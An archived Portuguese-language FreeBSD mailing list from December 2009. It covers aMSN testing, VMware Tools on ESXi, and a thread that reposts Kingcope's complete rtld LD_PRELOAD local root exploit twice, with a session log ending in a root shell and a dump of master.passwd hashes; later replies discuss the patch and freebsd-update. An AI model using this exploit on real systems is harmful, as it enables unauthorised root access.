[FUG-BR] [Call to Test] [OT] aMSN-0.98.1

2009-12-01 Por tôpico Sylvio Cesar
Bom dia senhores!

Gostaria de pedir aos usuários de aMSN que, se possível, testassem a
nova versão. Essa nova versão tem suporte à chamada de vídeo e áudio.

Um .tar.gz no estilo do ports pode ser baixado em:

http://people.freebsd.org/~sylvio/amsn-0.98.1.tar.gz

Obrigado a todos.


Att,

Sylvio César.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


[FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico mantunes
Alguem tem conhecimento disso ?? procede ??

*

** FreeBSD local r00t 0day
Discovered  Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 BiG TiME

Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like ping or su.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System :/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
:/home/kcope:/bin/sh
#

Systems tested/affected
**
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat  env.c  _EOF
#include stdio.h

main() {
       extern char **environ;
       environ = (char**)malloc(8096);

       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], LD_PRELOAD=/tmp/w00t.so.1.0);

       execl(/sbin/ping, ping, 0);
}
_EOF
gcc env.c -o env
cat  program.c  _EOF
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h

void _init() {
       extern char **environ;
       environ=NULL;
       system(echo ALEX-ALEX;/bin/sh);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Matheus L. Abreu
O Danilo Egea fez um lab e a coisa funciona mesmo.
=\

 --
Matheus L. Abreu
[ matheusl dot abreu (a) gmail.com ]
[ http://matheuslamberti.blogspot.com ]

Sine qua non
In theory there is no difference between theory and practice, but in
practice there is.
Para obter algo que você nunca teve, precisa fazer algo que nunca fez.


2009/12/1 mantunes mantunes.lis...@gmail.com

 Alguem tem conhecimento disso ?? procede ??

 *

 ** FreeBSD local r00t 0day
 Discovered  Exploited by Nikolaos Rangos also known as Kingcope.
 Nov 2009 BiG TiME

 Go fetch your FreeBSD r00tkitz //
 http://www.youtube.com/watch?v=dDnhthI27Fg

 There is an unbelievable simple local r00t bug in recent FreeBSD versions.
 I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

 The bug resides in the Run-Time Link-Editor (rtld).
 Normally rtld does not allow dangerous environment variables like
 LD_PRELOAD
 to be set when executing setugid binaries like ping or su.
 With a rather simple technique rtld can be tricked into
 accepting LD variables even on setugid binaries.
 See the attached exploit for details.

 Example exploiting session
 **
 %uname -a;id;
 FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
 15:48:17 UTC 2009
 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
 uid=1001(kcope) gid=1001(users) groups=1001(users)
 %./w00t.sh
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in
 function 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in
 function 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # uname -a;id;
 FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
 15:48:17 UTC 2009
 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
 uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
 # cat /etc/master.passwd
 # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
 kensmith Exp $
 #
 root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/bin/csh
 toor:*:0:0::0:0:Bourne-again Superuser:/root:
 daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
 operator:*:2:5::0:0:System :/:/usr/sbin/nologin
 bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
 tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
 kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
 games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
 news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
 man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
 sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25::0:0:Sendmail Submission
 User:/var/spool/clientmqueue:/usr/sbin/nologin
 mailnull:*:26:26::0:0:Sendmail Default
 User:/var/spool/mqueue:/usr/sbin/nologin
 bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
 proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
 _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
 _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
 uucp:*:66:66::0:0:UUCP
 pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
 pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
 www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
 kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
 :/home/kcope:/bin/sh
 #

 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN

 *EXPLOIT*

 #!/bin/sh
 echo ** FreeBSD local r00t zeroday
 echo by Kingcope
 echo November 2009
 cat  env.c  _EOF
 #include stdio.h

 main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], LD_PRELOAD=/tmp/w00t.so.1.0);

execl(/sbin/ping, ping, 0);
 }
 _EOF
 gcc env.c -o env
 cat  program.c  _EOF
 #include unistd.h
 #include stdio.h
 #include sys/types.h
 #include stdlib.h

 void _init() {
extern char **environ;
environ=NULL;
system(echo ALEX-ALEX;/bin/sh);
 }
 _EOF
 gcc -o program.o -c program.c -fPIC
 gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
 cp w00t.so.1.0 /tmp/w00t.so.1.0
 ./env
 

Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Renato Botelho
2009/12/1 Matheus L. Abreu matheusl.ab...@gmail.com:
 O Danilo Egea fez um lab e a coisa funciona mesmo.
 =\

A falha é conhecida, a solução já foi commitada no -CURRENT,
8-STABLE e 7-STABLE.

O security advisory deve sair amanhã e então as correções para
as versões -RELEASE

-- 
Renato Botelho
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Gustavo Freitas
Tenho uma duvida..

a versão RELEASE, depois que foi lançada vai ficar com essa falha ??
ou digamos se eu baixar essa versão na semana que vem depois do security
advisory ela ja vem corrigida ??

Como eu faço sempre que baixar o freebsd, baixar a versão atualizada
com os pacthes..



2009/12/1 Renato Botelho rbga...@gmail.com:
 2009/12/1 Matheus L. Abreu matheusl.ab...@gmail.com:
 O Danilo Egea fez um lab e a coisa funciona mesmo.
 =\

 A falha é conhecida, a solução já foi commitada no -CURRENT,
 8-STABLE e 7-STABLE.

 O security advisory deve sair amanhã e então as correções para
 as versões -RELEASE

 --
 Renato Botelho
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




-- 
Gustavo Freitas
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico mantunes
parece que saiu o patch para correção

 http://people.freebsd.org/~cperciva/rtld.patch

2009/12/1 Gustavo Freitas gst.frei...@gmail.com:
 Tenho uma duvida..

 a versão RELEASE, depois que foi lançada vai ficar com essa falha ??
 ou digamos se eu baixar essa versão na semana que vem depois do security
 advisory ela ja vem corrigida ??

 Como eu faço sempre que baixar o freebsd, baixar a versão atualizada
 com os pacthes..



 2009/12/1 Renato Botelho rbga...@gmail.com:
 2009/12/1 Matheus L. Abreu matheusl.ab...@gmail.com:
 O Danilo Egea fez um lab e a coisa funciona mesmo.
 =\

 A falha é conhecida, a solução já foi commitada no -CURRENT,
 8-STABLE e 7-STABLE.

 O security advisory deve sair amanhã e então as correções para
 as versões -RELEASE

 --
 Renato Botelho
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




 --
 Gustavo Freitas
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




-- 
Marcio Antunes
Powered by FreeBSD
==
* Windows: Where do you want to go tomorrow?
* Linux: Where do you want to go today?
* FreeBSD: Are you, guys, comming or what?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Marcelo/Porks
2009/12/1 Gustavo Freitas gst.frei...@gmail.com:
 Tenho uma duvida..

 a versão RELEASE, depois que foi lançada vai ficar com essa falha ??
 ou digamos se eu baixar essa versão na semana que vem depois do security
 advisory ela ja vem corrigida ??

Olha, até onde eu sei... funciona assim:

Quando a 6.2 foi lançada, ela se chamava:
6.2-RELEASE

conforme foram aparecendo alterações nelas:
6.2-RELEASE-p1
6.2-RELEASE-p2
...
6.2-RELEASE-p7
...

Hoje temos a:
8.0-RELEASE
e jajá eles soltam a
8.0-RELEASE-p1 com essa correção.

bastando você pegar o source (cvs/svn) e recompilar o sistema.

-- 
Marcelo Rossi
This e-mail is provided AS IS with no warranties, and confers no rights.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Renato Botelho
2009/12/1 Marcelo/Porks marceloro...@gmail.com:
 2009/12/1 Gustavo Freitas gst.frei...@gmail.com:
 Tenho uma duvida..

 a versão RELEASE, depois que foi lançada vai ficar com essa falha ??
 ou digamos se eu baixar essa versão na semana que vem depois do security
 advisory ela ja vem corrigida ??

 Olha, até onde eu sei... funciona assim:

 Quando a 6.2 foi lançada, ela se chamava:
 6.2-RELEASE

 conforme foram aparecendo alterações nelas:
 6.2-RELEASE-p1
 6.2-RELEASE-p2
 ...
 6.2-RELEASE-p7
 ...

 Hoje temos a:
 8.0-RELEASE
 e jajá eles soltam a
 8.0-RELEASE-p1 com essa correção.

Exato.

No caso de novas instalações, você pode instalar o 8.0-RELEASE do
dvd e depois já rodar um

# freebsd-update fetch install

Com isso ele vai virar o RELEASE-pN com todas as correções de
segurança.

-- 
Renato Botelho
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Zhu Sha Zang
Em 12/01/09 10:24, Gustavo Freitas escreveu:
 Tenho uma duvida..

 a versão RELEASE, depois que foi lançada vai ficar com essa falha ??
 ou digamos se eu baixar essa versão na semana que vem depois do security
 advisory ela ja vem corrigida ??

 Como eu faço sempre que baixar o freebsd, baixar a versão atualizada
 com os pacthes..



 2009/12/1 Renato Botelhorbga...@gmail.com:

 2009/12/1 Matheus L. Abreumatheusl.ab...@gmail.com:
  
 O Danilo Egea fez um lab e a coisa funciona mesmo.
 =\

 A falha é conhecida, a solução já foi commitada no -CURRENT,
 8-STABLE e 7-STABLE.

 O security advisory deve sair amanhã e então as correções para
 as versões -RELEASE

 --
 Renato Botelho
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

  



CSUP -g -L 2 /etc/stable-supfile
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


[FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Senhores,

Em todos os packages que encontrei (/usr/ports/emulators), são para 
VMware Workstation.

Como proceder para instalar VMware Guest Tools no FreeBSD 8.0 (x64) com 
host ESXi 4?

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Welkson Renny de Medeiros
Renato Botelho escreveu:
 Exato.

 No caso de novas instalações, você pode instalar o 8.0-RELEASE do
 dvd e depois já rodar um

 # freebsd-update fetch install

 Com isso ele vai virar o RELEASE-pN com todas as correções de
 segurança

Acabei de instalar esse FreeBSD 8 RELEASE (x64) (cd foi gravado faz uns 
4 dias).

# uname -a
FreeBSD xx.com.br 8.0-RELEASE FreeBSD 8.0-RELEASE #0

# freebsd-update fetch install
Looking up update.FreeBSD.org mirrors... 3 mirrors found.
Fetching metadata signature for 8.0-RELEASE from update5.FreeBSD.org... 
done.
Fetching metadata index... done.
Inspecting system... done.
Preparing to download files... done.

No updates needed to update system to 8.0-RELEASE-p0.
No updates are available to install.
Run '/usr/sbin/freebsd-update fetch' first.

Fiz então o fetch:

# freebsd-update fetch
Looking up update.FreeBSD.org mirrors... 3 mirrors found.
Fetching metadata signature for 8.0-RELEASE from update5.FreeBSD.org... 
done.
Fetching metadata index... done.
Inspecting system... done.
Preparing to download files... done.

No updates needed to update system to 8.0-RELEASE-p0.

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Welkson Renny de Medeiros escreveu:
 Senhores,

 Em todos os packages que encontrei (/usr/ports/emulators), são para 
 VMware Workstation.

 Como proceder para instalar VMware Guest Tools no FreeBSD 8.0 (x64) com 
 host ESXi 4?

   
Depois de uma pesquisada mais refinada no histórico da lista encontrei 
uma dica para montar a unidade de cd (mount /cdrom), copiar o tar.gz, 
descompactar e instalar por lá...

Durante a instalação recebo a seguinte mensagem:

Stopping VMware Tools services in the virtual machine:
   Guest operating system daemon:  done
Unable to copy the source file
/usr/local/lib/vmware-tools/modules/binary/FreeBSD8.0-amd64/vmxnet.ko to the
destination file /boot/modules/vmxnet.ko.

Execution aborted.

Analisando os arquivos vejo:
# cd /usr/local/lib/vmware-tools/modules/binary
# ls
FreeBSD6.0-amd64FreeBSD7.0-amd64
FreeBSD6.0-i386 FreeBSD7.0-i386

Ou seja, não tem módulo para 8.0-amd64...

Alguém já passou por isso?

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Nenhum_de_Nos
On Tue, 01 Dec 2009 11:55:23 -0300
Welkson Renny de Medeiros welk...@focusautomacao.com.br wrote:

 Renato Botelho escreveu:
  Exato.
 
  No caso de novas instalações, você pode instalar o 8.0-RELEASE do
  dvd e depois já rodar um
 
  # freebsd-update fetch install
 
  Com isso ele vai virar o RELEASE-pN com todas as correções de
  segurança
 
 Acabei de instalar esse FreeBSD 8 RELEASE (x64) (cd foi gravado faz uns 
 4 dias).
 
 # uname -a
 FreeBSD xx.com.br 8.0-RELEASE FreeBSD 8.0-RELEASE #0
 
 # freebsd-update fetch install
 Looking up update.FreeBSD.org mirrors... 3 mirrors found.
 Fetching metadata signature for 8.0-RELEASE from update5.FreeBSD.org... 
 done.
 Fetching metadata index... done.
 Inspecting system... done.
 Preparing to download files... done.
 
 No updates needed to update system to 8.0-RELEASE-p0.
 No updates are available to install.
 Run '/usr/sbin/freebsd-update fetch' first.
 
 Fiz então o fetch:
 
 # freebsd-update fetch
 Looking up update.FreeBSD.org mirrors... 3 mirrors found.
 Fetching metadata signature for 8.0-RELEASE from update5.FreeBSD.org... 
 done.
 Fetching metadata index... done.
 Inspecting system... done.
 Preparing to download files... done.
 
 No updates needed to update system to 8.0-RELEASE-p0.

o que saiu até agora foi patch meio de urgencia para RELENG_8_0, e correção 
para STABLE. ainda não saiu oficialmente no site, daí não tem ainda para 
freebsd-update. ele disse que depois de amanhã (dia que estão dizendo sair o 
anuncio) terá como fazer desta maneira para quem instalar um 8.0R zero bala do 
CD.

matheus

-- 
We will call you Cygnus,
The God of balance you shall be

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?

http://en.wikipedia.org/wiki/Posting_style
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Nilson
O VM tools é o mesmo para todos os produtos
da vmware, a única diferença será a versão
do vmtools que vc usar.

Uma boa alternativa, que alias passou a ser
a minha padrão para as VMs FreeBSD, é o
uso do port /usr/ports/emulators/open-vm-tools
que está bem atual, apenas cerca de 6 meses
atras do vmtools oficial, e é baseado no código
fonte open-source do vmware tools que é
liberado periódicamente pela vmware.

Funciona perfeitamente, suporta todos os
recursos disponíveis no oficial, e você ainda tem
a possibilidate de instalá-lo com ou sem algum
recurso, o que acho particularmente útil para
quem nao usa X.org. Aconselho  também
recompilá-lo sempre que atualizar seu kernel
para mantê-lo em sincronia.

[]s
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Nilson escreveu:
 O VM tools é o mesmo para todos os produtos
 da vmware, a única diferença será a versão
 do vmtools que vc usar.

 Uma boa alternativa, que alias passou a ser
 a minha padrão para as VMs FreeBSD, é o
 uso do port /usr/ports/emulators/open-vm-tools
 que está bem atual, apenas cerca de 6 meses
 atras do vmtools oficial, e é baseado no código
 fonte open-source do vmware tools que é
 liberado periódicamente pela vmware.

 Funciona perfeitamente, suporta todos os
 recursos disponíveis no oficial, e você ainda tem
 a possibilidate de instalá-lo com ou sem algum
 recurso, o que acho particularmente útil para
 quem nao usa X.org. Aconselho  também
 recompilá-lo sempre que atualizar seu kernel
 para mantê-lo em sincronia.

 []s
 Nilson

   

Acabei de ler sobre ele em um fórum [1], estou instalando... vamos ver 
como se comporta.

Estou achando tudo meio lento (QuadCore, 4GB RAM, disco SAS 15K RPM)... 
não sei se por falta do Tools, ou devido ainda não ter personalizado o 
Kernel (hz, entre outros ajustes).

Enfim, sugestões são bem vindas!

[1] http://forums.freebsd.org/showthread.php?t=8707

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Matheus L. Abreu
Até onde sei, os Tools não vão ajudar em nada.
Melhor ajustar o Kernel.
;D

 --
Matheus L. Abreu
[ matheusl dot abreu (a) gmail.com ]
[ http://matheuslamberti.blogspot.com ]

Sine qua non
In theory there is no difference between theory and practice, but in
practice there is.
Para obter algo que você nunca teve, precisa fazer algo que nunca fez.


2009/12/1 Welkson Renny de Medeiros welk...@focusautomacao.com.br

 Nilson escreveu:
  O VM tools é o mesmo para todos os produtos
  da vmware, a única diferença será a versão
  do vmtools que vc usar.
 
  Uma boa alternativa, que alias passou a ser
  a minha padrão para as VMs FreeBSD, é o
  uso do port /usr/ports/emulators/open-vm-tools
  que está bem atual, apenas cerca de 6 meses
  atras do vmtools oficial, e é baseado no código
  fonte open-source do vmware tools que é
  liberado periódicamente pela vmware.
 
  Funciona perfeitamente, suporta todos os
  recursos disponíveis no oficial, e você ainda tem
  a possibilidate de instalá-lo com ou sem algum
  recurso, o que acho particularmente útil para
  quem nao usa X.org. Aconselho  também
  recompilá-lo sempre que atualizar seu kernel
  para mantê-lo em sincronia.
 
  []s
  Nilson
 
 

 Acabei de ler sobre ele em um fórum [1], estou instalando... vamos ver
 como se comporta.

 Estou achando tudo meio lento (QuadCore, 4GB RAM, disco SAS 15K RPM)...
 não sei se por falta do Tools, ou devido ainda não ter personalizado o
 Kernel (hz, entre outros ajustes).

 Enfim, sugestões são bem vindas!

 [1] http://forums.freebsd.org/showthread.php?t=8707

 --
 Welkson Renny de Medeiros
 Desenvolvimento / Gerência de Redes
 Focus Automação Comercial
 FreeBSD Community Member

 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Nilson
2009/12/1 Welkson Renny de Medeiros welk...@focusautomacao.com.br:
 Acabei de ler sobre ele em um fórum [1], estou instalando... vamos ver
 como se comporta.

 Estou achando tudo meio lento (QuadCore, 4GB RAM, disco SAS 15K RPM)...
 não sei se por falta do Tools, ou devido ainda não ter personalizado o
 Kernel (hz, entre outros ajustes).

Não vá achar que vai ficar a mesma coisa que
rodando diretamente na máquina física né? Mas CPU em
geral fica muito bom (principalmente se o HOST suportar
a virtualização por hardware).
Os gargalos normalmente são memória RAM, e principalmente
o disco, o que se intensifica se você usar o flat vmdk, aquele
que vai se expandindo conforme você vai usando. É um ótimo
recurso, mas para economia de espaço em disco, não é pra
quem precisa de performance.

-- 
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Danilo Egea
Welkson Renny de Medeiros wrote:
 Nilson escreveu:
   
 O VM tools é o mesmo para todos os produtos
 da vmware, a única diferença será a versão
 do vmtools que vc usar.

 Uma boa alternativa, que alias passou a ser
 a minha padrão para as VMs FreeBSD, é o
 uso do port /usr/ports/emulators/open-vm-tools
 que está bem atual, apenas cerca de 6 meses
 atras do vmtools oficial, e é baseado no código
 fonte open-source do vmware tools que é
 liberado periódicamente pela vmware.

 Funciona perfeitamente, suporta todos os
 recursos disponíveis no oficial, e você ainda tem
 a possibilidate de instalá-lo com ou sem algum
 recurso, o que acho particularmente útil para
 quem nao usa X.org. Aconselho  também
 recompilá-lo sempre que atualizar seu kernel
 para mantê-lo em sincronia.

 []s
 Nilson

   
 

 Acabei de ler sobre ele em um fórum [1], estou instalando... vamos ver 
 como se comporta.

 Estou achando tudo meio lento (QuadCore, 4GB RAM, disco SAS 15K RPM)... 
 não sei se por falta do Tools, ou devido ainda não ter personalizado o 
 Kernel (hz, entre outros ajustes).

 Enfim, sugestões são bem vindas!

 [1] http://forums.freebsd.org/showthread.php?t=8707

   

Opa, cara eu tive um problemas de desempenho com o FreeBSD virtualizado 
(vbox), a lentidão era por causa da frequencia do timer do sistema, eu 
diminui para 100HZ e ficou filé. Coloque kern.hz=100 no seu loader.conf 
ou compile o kernel com options HZ=100

abraços!

-- 
Danilo Egêa Gondolfo
Email/MSN - daniloe...@yahoo.com.br
Skype - daniloegea
Twitter - http://twitter.com/daniloegea
Blog - http://daniloegea.wordpress.com

__
Faça ligações para outros computadores com o novo Yahoo! Messenger 
http://br.beta.messenger.yahoo.com/ 

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Nilson escreveu:
 Não vá achar que vai ficar a mesma coisa que
 rodando diretamente na máquina física né? Mas CPU em
 geral fica muito bom (principalmente se o HOST suportar
 a virtualização por hardware).
 Os gargalos normalmente são memória RAM, e principalmente
 o disco, o que se intensifica se você usar o flat vmdk, aquele
 que vai se expandindo conforme você vai usando. É um ótimo
